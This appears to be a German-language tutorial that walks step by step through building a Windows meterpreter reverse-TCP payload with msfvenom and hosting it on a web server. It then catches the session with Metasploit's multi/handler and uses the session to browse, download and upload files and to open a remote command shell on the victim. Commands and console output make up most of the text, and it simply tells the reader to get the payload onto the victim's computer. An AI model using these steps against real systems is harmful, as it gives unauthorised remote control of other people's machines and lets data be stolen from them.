Payload erstellen

• msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.81.1.91 LPORT=4444 -f exe > shell.exe
• cp shell.exe /var/www/html/

Payload auf den Opfer Rechner bringen und ausführen

Konsole starten

• msfconsole

Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
Aiee, Killing Interrupt handler
Kernel panic: Attempted to kill the idle task!
In swapper task - not syncing


       =[ metasploit v4.16.6-dev                          ]
+ -- --=[ 1682 exploits - 964 auxiliary - 297 post        ]
+ -- --=[ 498 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

• msf > use exploit/multi/handler
• msf exploit(handler) > set PAYLOAD windows/meterpreter/rev
• msf exploit(handler) > set LHOST 10.81.1.91

LHOST => 10.81.1.91

• msf exploit(handler) > set LPORT 4444

LPORT => 4444

Starten des exploits

• msf exploit(handler) > exploit

[*] Exploit running as background job 0. 

[*] Started reverse TCP handler on 10.81.1.91:4444

Anzeigen der Sessions

• msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                     Information              Connection
  --  ----                     -----------              ----------
  1   meterpreter x86/windows  shuttle\xinux @ SHUTTLE  10.81.1.91:4444 -> 10.81.70.36:50707 (10.81.70.36)

Wechseln in session

• msf exploit(handler) > sessions -i 1

[*] Starting interaction with 1...

Dateien Managment

pwd

• meterpreter > pwd

cd

• meterpreter > cd ..
• meterpreter > cd \\Windows\\System32\\drivers\\etc

Download

• meterpreter > download hosts

UPload

• meterpreter > cd \\Users\\xinux
• meterpreter > upload hosts

Starten einer Shell

• meterpreter > shell

Process 6588 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. Alle Rechte vorbehalten.

• C:\Users\xinux\Downloads>

Beispiele Shell

• ipconfig
• route print
• netstat -n

Quit

• STRG+c